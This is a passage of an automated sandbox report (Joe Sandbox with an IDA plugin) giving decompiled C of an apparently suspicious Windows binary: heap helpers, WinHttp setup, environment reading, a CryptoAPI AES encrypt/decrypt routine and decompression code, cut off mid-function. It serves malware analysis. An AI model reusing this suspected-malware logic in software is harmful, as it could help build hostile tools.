				intOrPtr _t42;
				void* _t43;

				_t42 = __ecx;
				_t2 = _t42 + 0x4fc; // 0x4fc
				_t41 = _t2;
				_v8 = 0;
				if( *((intOrPtr*)(__ecx + 0x504)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 8)))) + 0x20))))() == 0 || E0039EA90(__ecx) == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t21 =  *((intOrPtr*)(__ecx + 0x40));
					__imp___wtoi(_t21);
					if(_t21 != 1) {
						E00399090(__eflags,  &_v208, 0x2c);
						_push( *((intOrPtr*)(_t42 + 0x38)));
						_push( *((intOrPtr*)(_t42 + 0x50)));
						_push( *((intOrPtr*)(_t42 + 0x40)));
						_push( *((intOrPtr*)(_t42 + 0x14)));
						_t43 = E00391720(_t42,  &_v208,  *((intOrPtr*)(_t42 + 0x18)));
						__eflags = _t43;
						if(_t43 == 0) {
							L7:
							_v8 = 0;
						} else {
							_t28 = E00398800(_t41, _t43,  &_v8); // executed
							__eflags = _t28;
							if(_t28 == 0) {
								goto L7;
							}
						}
						__eflags = _t43;
						if(_t43 != 0) {
							E0039BB40(_t43);
						}
						return _v8;
					} else {
						return 0xc8;
					}
				}
			}










    0x00396e8a
    0x00396e94
    0x00396e94
    0x00396e9a
    0x00396ea1
    0x00396f4b
    0x00396f51
    0x00396ec8
    0x00396ec8
    0x00396ecc
    0x00396ed8
    0x00396eee
    0x00396efc
    0x00396f00
    0x00396f04
    0x00396f05
    0x00396f14
    0x00396f19
    0x00396f1b
    0x00396f2d
    0x00396f2d
    0x00396f1d
    0x00396f24
    0x00396f29
    0x00396f2b
    0x00000000
    0x00000000
    0x00396f2b
    0x00396f34
    0x00396f36
    0x00396f39
    0x00396f3e
    0x00396f49
    0x00396edb
    0x00396ee4
    0x00396ee4
    0x00396ed8

    APIs
      • Part of subcall function 0039EA90: rand.MSVCRT ref: 0039EAB3
      • Part of subcall function 0039EA90: rand.MSVCRT ref: 0039EAE6
    • _wtoi.MSVCRT ref: 00396ECC
      • Part of subcall function 00391720: _vsnwprintf.MSVCRT ref: 00391747
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00391720, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 100%
    			E00391720(wchar_t* _a8, void _a12) {
				wchar_t* _t5;
				int _t8;
				wchar_t* _t11;
				wchar_t* _t14;
				void* _t21;

				_t5 = E003A1D90(0x800, 0); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					L6:
					return 0;
				}
				_t8 = _vsnwprintf(_t14, 0x3ff, _a8,  &_a12);
				if(_t8 < 0) {
					L5:
					_t14[0x3ff] = 0;
					E0039BB40(_t14);
					goto L6;
				}
				_t21 = _t8 - 0x3ff;
				if(_t21 > 0) {
					goto L5;
				}
				_t11 = _t14;
				if(_t21 != 0) {
					return _t11;
				} else {
					_t14[0x3ff] = 0;
					return _t11;
				}
			}








    0x0039172b
    0x00391730
    0x00391737
    0x0039177d
    0x00000000
    0x0039177d
    0x00391747
    0x00391752
    0x0039176b
    0x0039176e
    0x00391775
    0x00000000
    0x0039177a
    0x00391754
    0x00391759
    0x00000000
    0x00000000
    0x0039175b
    0x0039175d
    0x00391781
    0x0039175f
    0x00391761
    0x0039176a
    0x0039176a

    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • _vsnwprintf.MSVCRT ref: 00391747
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B1D30, Relevance: 1.5, APIs: 1, Instructions: 33
    C-Code - Quality: 37%
    			E003B1D30(intOrPtr* __ecx) {
				char _v724;
				intOrPtr _t10;
				intOrPtr* _t16;

				_t16 = __ecx;
				 *__ecx = 0x3b3398;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				_t10 = E00399090(0,  &_v724, 0x49);
				__imp__WinHttpOpen( &_v724, 0, 0, 0, 0); // executed
				 *((intOrPtr*)(_t16 + 4)) = _t10;
				return _t16;
			}






    0x003b1d3a
    0x003b1d4a
    0x003b1d50
    0x003b1d53
    0x003b1d56
    0x003b1d59
    0x003b1d5c
    0x003b1d60
    0x003b1d73
    0x003b1d79
    0x003b1d83

    APIs
    • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B2403, Relevance: 1.5, APIs: 1, Instructions: 11
    C-Code - Quality: 37%
    			E003B2403() {
				intOrPtr _t1;
				WCHAR* _t2;

				_t1 =  *0x3b8980; // 0x0
				_push(0x3b8654);
				_push( *0x3b897c);
				 *0x3b8654 = _t1;
				_push(0x3b8644);
				_push(0x3b8648);
				_push(0x3b8640); // executed
				_t2 = GetEnvironmentStringsW(); // executed
				 *0x3b8650 = _t2;
				return _t2;
			}





    0x003b2403
    0x003b2408
    0x003b240d
    0x003b2413
    0x003b2418
    0x003b241d
    0x003b2422
    0x003b2427
    0x003b2430
    0x003b2435

    APIs
    • GetEnvironmentStringsW.KERNELBASE ref: 003B2427
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003968A0, Relevance: 1.4, APIs: 1, Instructions: 134
    C-Code - Quality: 97%
    			E003968A0(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void** _a16, signed int* _a20) {
				int* _v8;
				void* _v12;
				char _v16;
				int* _v20;
				char _v24;
				void* _t35;
				void* _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t60;
				int* _t88;
				intOrPtr _t90;
				void* _t91;

				_t60 = __ecx;
				_t58 = _a12;
				_t2 = _t60 + 8; // 0x8
				_t89 = _t2;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *_t2 = _a4;
				if(_a12 >= 0x30) {
					_push(__edi);
					_t35 = E00396040(_t89, _a8, _a8, 0x20,  &_v12); // executed
					if(_t35 == 0) {
						L10:
						_t90 = _v20;
						L11:
						_t36 = _v12;
						if(_v12 != 0) {
							E0039BB40(_t36);
							_t91 = _t91 + 4;
						}
						_t37 = _v16;
						if(_v16 != 0) {
							E0039BB40(_t37);
							_t91 = _t91 + 4;
						}
						_t38 = _v8;
						if(_v8 != 0) {
							E0039BB40(_t38); // executed
						}
						return _t90;
					}
					_t44 = E00396040(_t89, _t85, _t85 + 0x10, 0x20,  &_v16); // executed
					if(_t44 == 0) {
						goto L10;
					}
					_t46 = E003976E0(_t85 + 0x30, _t58 + 0xffffffd0, _v12, _v16,  &_v8,  &_v24); // executed
					if(_t46 == 0) {
						goto L10;
					}
					_t88 = _v8;
					_t47 =  *_t88;
					_t19 =  &(_t88[2]); // 0x8
					_t49 = E0039DAF0(_t89, _t88,  *_t88 + 8, _t19 + _t47, 0); // executed
					if(_t49 == 0) {
						goto L10;
					}
					_t50 = _t88[1];
					if((_t88[1] & 0x00000001) == 0) {
						_t51 = E003A1D90( *_t88, 0); // executed
						_t91 = _t91 + 8;
						 *_a16 = _t51;
						if(_t51 == 0) {
							goto L10;
						}
						memcpy(_t51,  &(_v8[2]),  *_t88);
						_t91 = _t91 + 0xc;
						 *_a20 =  *_t88;
						_t90 = 1;
						goto L11;
					}
					if(E00395900(_t89,  &(_v8[2]),  *_t88, _t50 >> 1, _a16) == 0) {
						goto L10;
					}
					 *_a20 = _t88[1] >> 1;
					_t90 = 1;
					goto L11;
				}
				return 0;
			}

















    0x003968a0
    0x003968a7
    0x003968ad
    0x003968ad
    0x003968b3
    0x003968b6
    0x003968b9
    0x003968bc
    0x003968bf
    0x003968c2
    0x003968c7
    0x003968cd
    0x003968da
    0x003968e1
    0x003969ae
    0x003969ae
    0x003969b1
    0x003969b1
    0x003969b7
    0x003969ba
    0x003969bf
    0x003969bf
    0x003969c2
    0x003969c7
    0x003969ca
    0x003969cf
    0x003969cf
    0x003969d2
    0x003969d7
    0x003969da
    0x003969df
    0x00000000
    0x003969e2
    0x003968f3
    0x003968fa
    0x00000000
    0x00000000
    0x0039691a
    0x00396921
    0x00000000
    0x00000000
    0x00396927
    0x0039692a
    0x0039692e
    0x0039693a
    0x00396941
    0x00000000
    0x00000000
    0x00396943
    0x00396948
    0x0039697c
    0x00396984
    0x00396987
    0x0039698b
    0x00000000
    0x00000000
    0x00396998
    0x003969a2
    0x003969a5
    0x003969a7
    0x00000000
    0x003969a7
    0x00396964
    0x00000000
    0x00000000
    0x0039696e
    0x00396970
    0x00000000
    0x00396970
    0x003969e9

    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 00396998
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003976E0: memcpy.MSVCRT ref: 003977B9
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00391F00, Relevance: 1.3, APIs: 1, Instructions: 85
    C-Code - Quality: 37%
    			E00391F00(void** __ecx, void* _a4, int _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				char _v216;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				void** _t38;
				int _t40;
				void* _t41;
				void* _t42;
				intOrPtr _t45;

				_t38 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t45 =  *0x3b85c0; // 0x1
				if(_t45 != 0) {
					_t17 =  *0x3b85d4( &_v8, 0x3b32c0, 0); // executed
					__eflags = _t17;
					if(__eflags >= 0) {
						E00399090(__eflags,  &_v216, 0xbc);
						_t32 = _a4;
						_t42 = _t41 + 8;
						_t40 = _a8;
						_t25 =  *0x3b85e8(_v8, 0,  &_v216, 0,  &_v12, _t32, _t40, 0, _t31);
						__eflags = _t25;
						if(_t25 >= 0) {
							_t26 =  *_t38;
							__eflags = _t26;
							if(_t26 != 0) {
								E0039BB40(_t26);
								_t42 = _t42 + 4;
							}
							_t27 = E003A1D90(_t40, 0);
							 *_t38 = _t27;
							__eflags = _t27;
							if(_t27 != 0) {
								memcpy(_t27, _t32, _t40);
								_t38[1] = _t40;
								_v16 = 1;
							}
						}
					}
					_t18 = _v12;
					__eflags = _t18;
					if(_t18 != 0) {
						 *0x3b85cc(_t18, 0);
					}
					_t19 = _v8;
					__eflags = _t19;
					if(_t19 != 0) {
						 *0x3b85b8(_t19);
					}
					return _v16;
				} else {
					return 0;
				}
			}




















    0x00391f0d
    0x00391f0f
    0x00391f12
    0x00391f15
    0x00391f18
    0x00391f1e
    0x00391f34
    0x00391f3a
    0x00391f3c
    0x00391f4b
    0x00391f50
    0x00391f56
    0x00391f5a
    0x00391f6f
    0x00391f75
    0x00391f77
    0x00391f79
    0x00391f7b
    0x00391f7d
    0x00391f80
    0x00391f85
    0x00391f85
    0x00391f8b
    0x00391f93
    0x00391f95
    0x00391f97
    0x00391f9c
    0x00391fa4
    0x00391fa7
    0x00391fa7
    0x00391f97
    0x00391fae
    0x00391faf
    0x00391fb2
    0x00391fb4
    0x00391fb9
    0x00391fb9
    0x00391fbf
    0x00391fc2
    0x00391fc4
    0x00391fc7
    0x00391fc7
    0x00391fd5
    0x00391f21
    0x00391f27
    0x00391f27

    APIs
    • memcpy.MSVCRT ref: 00391F9C
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039BB40, Relevance: 1.3, APIs: 1, Instructions: 12
    C-Code - Quality: 100%
    			E0039BB40(void* _a4) {
				void* _t2;
				void* _t3;
				int _t4;

				_t2 = _a4;
				if(_t2 != 0) {
					_t3 =  *0x3b862c; // 0x290000
					_t4 = HeapFree(_t3, 8, _t2); // executed
					return _t4;
				}
				return _t2;
			}






    0x0039bb43
    0x0039bb48
    0x0039bb4b
    0x0039bb53
    0x00000000
    0x0039bb53
    0x0039bb5a

    APIs
    • HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Non-executed Functions

    Function 003AEF6B, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 140encryption
    C-Code - Quality: 23%
    			E003AEF6B(void* _a4, int _a8, void* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24) {
				long* _v8;
				void* _v12;
				long* _v16;
				int _v20;
				signed int _t42;
				void* _t48;
				int _t51;
				DWORD* _t67;
				BYTE* _t71;
				signed int _t78;
				char _t82;
				int _t84;
				void* _t90;

				_t78 = _a8;
				_t42 = _t78 & 0x8000000f;
				if(_t42 < 0) {
					_t90 = (_t42 - 0x00000001 | 0xfffffff0) + 1;
				}
				if(_t90 != 0) {
					L13:
					return 0;
				} else {
					_t82 = 0x10;
					if(_t78 < _t82) {
						goto L13;
					}
					_v16 = 0;
					if(CryptAcquireContextA( &_v16, 0, 0, 0x18, 0xf0000000) == 0) {
						goto L13;
					}
					_t48 =  *0x3b8538(_t78 + _t78);
					_v12 = _t48;
					_t71 =  *0x3b8538(0x1c);
					 *_t71 = 0x208;
					_t71[4] = 0x660e;
					_t71[8] = _t82;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t51 = CryptImportKey(_v16, _t71, 0x1c, 0, 0,  &_v8);
					if(_t51 == 0) {
						L12:
						CryptReleaseContext(_v16, 0);
						 *0x3b8540(_v12);
						 *0x3b8540(_t71);
						goto L13;
					}
					__imp__CryptSetKeyParam(_v8, 1, _a20, 0);
					if(_t51 == 0) {
						L11:
						CryptDestroyKey(_v8);
						goto L12;
					}
					_t84 = _a8;
					memcpy(_v12, _a4, _t84);
					_v20 = _t84;
					if(_a24 == 0) {
						if(CryptDecrypt(_v8, 0, 1, 0, _v12,  &_v20) != 0) {
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							memcpy(_a12, _v12, _a8);
							CryptDestroyKey(_v8);
							CryptReleaseContext(_v16, 0);
							 *0x3b8540(_v12);
							 *0x3b8540(_t71);
							return _v20;
						}
						goto L11;
					}
					_t67 =  &_v20;
					__imp__CryptEncrypt(_v8, 0, 1, 0, _v12, _t67, _t84 + _t84);
					if(_t67 == 0) {
						goto L11;
					}
					goto L16;
				}
			}
















    0x003aef74
    0x003aef79
    0x003aef7e
    0x003aef84
    0x003aef84
    0x003aef85
    0x003af08c
    0x00000000
    0x003aef8b
    0x003aef8d
    0x003aef90
    0x00000000
    0x00000000
    0x003aefa1
    0x003aefb0
    0x00000000
    0x00000000
    0x003aefba
    0x003aefc2
    0x003aefcb
    0x003aefcd
    0x003aefd3
    0x003aefda
    0x003aefe3
    0x003aefe4
    0x003aefe6
    0x003aefe8
    0x003aeff7
    0x003aefff
    0x003af070
    0x003af074
    0x003af07d
    0x003af084
    0x00000000
    0x003af08b
    0x003af00a
    0x003af012
    0x003af067
    0x003af06a
    0x00000000
    0x003af06a
    0x003af014
    0x003af01e
    0x003af026
    0x003af02c
    0x003af065
    0x003af096
    0x003af0a3
    0x003af0a7
    0x003af0a8
    0x003af0a9
    0x003af0aa
    0x003af0b5
    0x003af0c0
    0x003af0c9
    0x003af0d0
    0x00000000
    0x003af0da
    0x00000000
    0x003af065
    0x003af032
    0x003af040
    0x003af048
    0x00000000
    0x00000000
    0x00000000
    0x003af04a

    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003AEFA8
    • CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003AEFF7
    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003AF00A
    • memcpy.MSVCRT ref: 003AF01E
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003AF040
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003AF05D
    • CryptDestroyKey.ADVAPI32(?), ref: 003AF06A
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF074
    • memcpy.MSVCRT ref: 003AF0AA
    • CryptDestroyKey.ADVAPI32(?), ref: 003AF0B5
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF0C0
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A257B, Relevance: 14.1, APIs: 10, Instructions: 1558Crypto
    C-Code - Quality: 99%
    			E003A257B(int* __esi, signed int _a4, signed int* _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24) {
				void* _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed char* _v24;
				void* _v28;
				signed int _v32;
				signed char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				int _v56;
				signed int _v60;
				intOrPtr _v124;
				intOrPtr _v128;
				void _v192;
				void* _t811;
				signed int _t812;
				signed int* _t815;
				void* _t816;
				signed int _t821;
				signed int _t822;
				signed int _t831;
				void* _t834;
				signed int _t835;
				void* _t841;
				void* _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int* _t854;
				signed int _t858;
				unsigned int _t861;
				signed int _t862;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				int _t880;
				signed int _t884;
				signed int _t896;
				signed int _t900;
				void* _t902;
				signed int _t905;
				void* _t908;
				signed int _t912;
				int _t916;
				intOrPtr* _t919;
				char* _t922;
				signed int _t926;
				signed char* _t933;
				signed int _t937;
				signed int _t940;
				signed int _t941;
				signed int _t943;
				signed int _t951;
				signed int _t952;
				char* _t953;
				signed char* _t955;
				signed int _t959;
				signed int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t968;
				signed int _t972;
				signed int _t988;
				void* _t989;
				int _t992;
				signed int _t1002;
				signed int _t1004;
				int _t1005;
				signed int _t1012;
				signed int _t1013;
				signed char* _t1014;
				signed int _t1018;
				signed int _t1021;
				signed int _t1022;
				signed int _t1024;
				signed int _t1025;
				signed int _t1026;
				signed int _t1027;
				signed int _t1030;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1053;
				signed int _t1055;
				signed int _t1056;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1062;
				signed int _t1063;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				void* _t1090;
				signed int _t1091;
				signed int _t1093;
				void* _t1104;
				signed int _t1105;
				signed int* _t1107;
				signed int _t1108;
				void* _t1112;
				void* _t1113;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed char* _t1122;
				signed char _t1131;
				signed char _t1144;
				void* _t1150;
				intOrPtr _t1151;
				signed char _t1157;
				signed char _t1163;
				signed int _t1168;
				signed int* _t1175;
				short* _t1176;
				signed char _t1177;
				signed char _t1178;
				signed int _t1180;
				signed int _t1182;
				signed char _t1186;
				signed char _t1187;
				signed int _t1190;
				intOrPtr* _t1191;
				signed int _t1200;
				signed char _t1207;
				signed char _t1212;
				int _t1222;
				signed char* _t1226;
				signed char* _t1228;
				signed char* _t1230;
				signed char* _t1232;
				signed char* _t1234;
				signed char* _t1243;
				char* _t1297;
				intOrPtr _t1298;
				signed int _t1299;
				intOrPtr* _t1312;
				signed int _t1313;
				signed int _t1316;
				signed int _t1318;
				signed char* _t1336;
				signed int _t1337;
				int _t1338;
				void* _t1340;
				void* _t1341;
				void* _t1342;
				void* _t1343;
				void* _t1344;
				void* _t1345;
				void* _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1357;
				signed int _t1358;
				char* _t1359;
				char* _t1362;
				signed int _t1366;
				void* _t1368;
				signed int _t1369;
				int _t1375;
				int _t1379;
				int* _t1381;
				void* _t1382;
				void* _t1383;
				void* _t1389;
				void* _t1390;

				_t1381 = __esi;
				_t1243 = _a4;
				_v20 = _v20 | 0xffffffff;
				_t1090 = _a16;
				_t811 =  *_a20;
				_v48 = _t811 + _t1090;
				_t1336 =  &(_t1243[ *_a8]);
				_t1117 = _a24 & 0x00000004;
				_v8 = _t1243;
				_v24 = _t1336;
				_v28 = _t1090;
				_v44 = _t1117;
				if(_t1117 == 0) {
					_t812 = _t811 - _a12;
					__eflags = _t812;
					_t16 = _t1090 - 1; // 0xfe
					_t1118 = _t812 + _t16;
				} else {
					_t1118 = _t1117 | 0xffffffff;
				}
				_t17 = _t1118 + 1; // 0xff
				_v60 = _t1118;
				if((_t1118 & _t17) != 0 || _t1090 < _a12) {
					 *_a20 =  *_a20 & 0x00000000;
					_t815 = _a8;
					 *_t815 =  *_t815 & 0x00000000;
					__eflags =  *_t815;
					_t816 = 0xfffffffd;
					return _t816;
				} else {
					_t1091 = _t1381[1];
					_t1119 = _t1381[8];
					_v12 = _t1381[0xe];
					_v16 = _t1381[9];
					_v36 = _t1381[0xa];
					_v56 = _t1381[0xf];
					_t821 =  *_t1381;
					_v32 = _t1091;
					_v40 = _t1119;
					_t1389 = _t821 - 0x18;
					if(_t1389 > 0) {
						__eflags = _t821 - 0x26;
						if(__eflags > 0) {
							_t822 = _t821 - 0x27;
							__eflags = _t822;
							if(_t822 == 0) {
								L394:
								 *_t1381 = 0x27;
								L395:
								_v20 = _v20 | 0xffffffff;
								L396:
								_t1381[0xe] = _v12;
								_t1381[8] = _v40;
								_t1381[9] = _v16;
								_t1381[0xa] = _v36;
								_t1381[0xf] = _v56;
								_t1381[1] = _t1091;
								 *_a8 = _v8 - _a4;
								_t831 = _v28 - _a16;
								 *_a20 = _t831;
								if((_a24 & 0x00000009) == 0 || _v20 < 0) {
									L410:
									return _v20;
								} else {
									_t1122 = _a16;
									_a16 = _t1381[7] & 0x0000ffff;
									_a20 = _t831;
									_t1337 = _t1381[7] & 0x0000ffff;
									_t1093 = _a16;
									_a4 = _t831 % 0x15b0;
									if(_a20 == 0) {
										L406:
										_t1338 = _t1337 + (_t1093 << 0x10);
										_t1381[7] = _t1338;
										if(_v20 == 0 && (_a24 & 0x00000001) != 0 && _t1338 != _t1381[4]) {
											_v20 = 0xfffffffe;
										}
										goto L410;
									} else {
										goto L399;
									}
									do {
										L399:
										_a16 = _a16 & 0x00000000;
										_t834 = 7;
										if(_a4 <= _t834) {
											L402:
											_t835 = _a4;
											if(_a16 >= _t835) {
												goto L405;
											}
											_t841 = _t835 - _a16;
											do {
												_t1337 = _t1337 + ( *_t1122 & 0x000000ff);
												_t1122 =  &(_t1122[1]);
												_t1093 = _t1093 + _t1337;
												_t841 = _t841 - 1;
											} while (_t841 != 0);
											goto L405;
										}
										_t842 = _t834 - _t1122;
										do {
											_t1340 = _t1337 + ( *_t1122 & 0x000000ff);
											_t1341 = _t1340 + (_t1122[1] & 0x000000ff);
											_t1342 = _t1341 + (_t1122[2] & 0x000000ff);
											_t1343 = _t1342 + (_t1122[3] & 0x000000ff);
											_a16 = _a16 + 8;
											_t1344 = _t1343 + (_t1122[4] & 0x000000ff);
											_t1345 = _t1344 + (_t1122[5] & 0x000000ff);
											_t1346 = _t1345 + (_t1122[6] & 0x000000ff);
											_t1337 = _t1346 + (_t1122[7] & 0x000000ff);
											_t1122 =  &(_t1122[8]);
											_t1093 = _t1093 + _t1340 + _t1341 + _t1342 + _t1343 + _t1344 + _t1345 + _t1346 + _t1337;
										} while ( &(_t1122[_t842]) < _a4);
										goto L402;
										L405:
										_t1337 = _t1337 % 0xfff1;
										_t796 =  &_a20;
										 *_t796 = _a20 - _a4;
										_a4 = 0x15b0;
										_t1093 = _t1093 % 0xfff1;
									} while ( *_t796 != 0);
									goto L406;
								}
							}
